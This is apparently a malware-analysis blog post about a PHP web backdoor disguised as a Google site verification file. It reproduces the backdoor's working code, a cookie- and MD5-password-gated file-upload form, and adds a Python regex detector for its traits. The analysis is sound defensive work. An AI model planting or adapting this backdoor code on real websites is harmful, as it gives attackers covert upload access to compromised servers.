Today we found new malware that our signatures had not detected before. At first glance it looks just like a Google site verification HTML file, complete with meta tags. A Robots meta tag has also been added to keep Google from indexing the file.
If someone accesses this file from a browser, it looks like a normal verification code, and the page source looks like the output shown below.
The filename of this malware is also a random string, 8d4c0e4dcf768ec.php, which is not the name a Google site verification file should have.
Google Site Verification meta tags
    262f6d9a4d7bc493a15fe97e6286086b
    <meta name="Robots" contect="noindex,nofollow">
    <meta name="google-site-verification" content="262f6d9a4d7bc493a15fe97e6286086b">
Access control cookie
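If no cookie is set, a POST request with a username parameter can be sent instead. The script stores the MD5 of that value in the pd cookie, and if it matches the hard-coded hash, the malware presents a file upload form that allows more files to be uploaded to the server.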
    if(isset($_COOKIE['pd'])){
        if($_COOKIE['pd']=="8a8f905210c6780abc7648bc1e7f3e00"){
            echo fileup();
        }
    }
    if(isset($_POST['username'])){
        $username=$_POST['username'];
        $username=md5($username);
        setcookie("pd",$username,time()+3600*24);
        if($username=="8a8f905210c6780abc7648bc1e7f3e00"){
            echo fileup();
        }
        exit();
    }
fileup() function
    function fileup(){
        $up="<html>
        <body>
        <form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
        <label for=\"file\">Filename:</label>
        <input type=\"file\" name=\"file\" id=\"file\" />
        <br />
        <input type=\"submit\" name=\"submit\" value=\"Submit\" />
        </form>
        </body>
        </html>";
        return $up;
    }
    if(isset($_FILES["file"])){
        if ($_FILES["file"]["error"] > 0) {
            echo "Error: " . $_FILES["file"]["error"] . "<br />";
        } else {
            echo "Upload: " . $_FILES["file"]["name"] . "<br />";
            echo "Type: " . $_FILES["file"]["type"] . "<br />";
            echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
            echo "Stored in: " . $_FILES["file"]["tmp_name"];
            move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
            echo $_FILES["file"]["name"];
        }
    }
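A minimal static check for the traits described above, as an added example that is not Malware Expert's own signature set. The indicator names, verdict labels and both sample inputs are constructed for illustration.

```python
import re

# Indicators derived from the sample analysed above; names are this example's own.
INDICATORS = {
    "verification_decoy": re.compile(rb"name=[\"']google-site-verification[\"']", re.I),
    "php_code": re.compile(rb"<\?(?:php|=|\s)", re.I),
    # Cookie compared directly against a hard-coded 32-hex (MD5-sized) literal.
    "cookie_vs_md5_literal": re.compile(
        rb"\$_COOKIE\[[^\]]+\]\s*==\s*[\"'][0-9a-f]{32}[\"']", re.I),
    # Upload saved under the client-supplied filename, with no validation.
    "upload_to_client_name": re.compile(
        rb"move_uploaded_file\(\s*\$_FILES\[[^\]]+\]\[[\"']tmp_name[\"']\]\s*,"
        rb"\s*\$_FILES\[[^\]]+\]\[[\"']name[\"']\]", re.I),
}

def findings(data: bytes) -> list[str]:
    """Return the names of all indicators present in the file content."""
    return [name for name, rx in INDICATORS.items() if rx.search(data)]

def classify(filename: str, data: bytes) -> str:
    hits = set(findings(data))
    decoy = "verification_decoy" in hits
    executable = "php_code" in hits or filename.lower().endswith((".php", ".phtml"))
    backdoor = hits & {"cookie_vs_md5_literal", "upload_to_client_name"}
    if decoy and executable and backdoor:
        return "malicious"   # verification decoy wrapped around backdoor logic
    if (decoy and executable) or backdoor:
        return "review"      # a theme header may legitimately carry the meta tag
    return "clean"

# Constructed sample: key lines of the analysed file, condensed.
SAMPLE_BACKDOOR = b'''<meta name="Robots" contect="noindex,nofollow">
<meta name="google-site-verification" content="262f6d9a4d7bc493a15fe97e6286086b">
<?php
if(isset($_COOKIE['pd'])){ if($_COOKIE['pd']=="8a8f905210c6780abc7648bc1e7f3e00"){ echo fileup(); } }
if(isset($_FILES["file"])){ move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]); }
'''
# Constructed benign page that only carries the verification meta tag.
SAMPLE_BENIGN = (b'<html><head><meta name="google-site-verification" '
                 b'content="EXAMPLE-TOKEN"></head></html>')

if __name__ == "__main__":
    for name, data in [("8d4c0e4dcf768ec.php", SAMPLE_BACKDOOR),
                       ("index.html", SAMPLE_BENIGN)]:
        print(name, classify(name, data), findings(data))
```

Files rated "review" need a manual look, because a legitimate PHP template can contain the verification meta tag and a legitimate upload handler can reuse the client filename.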
Final words
Use Malware Expert – Signatures to detect this malware in files for FREE!
Websites that use Malware Expert – ModSecurity rules are protected against this kind of attack.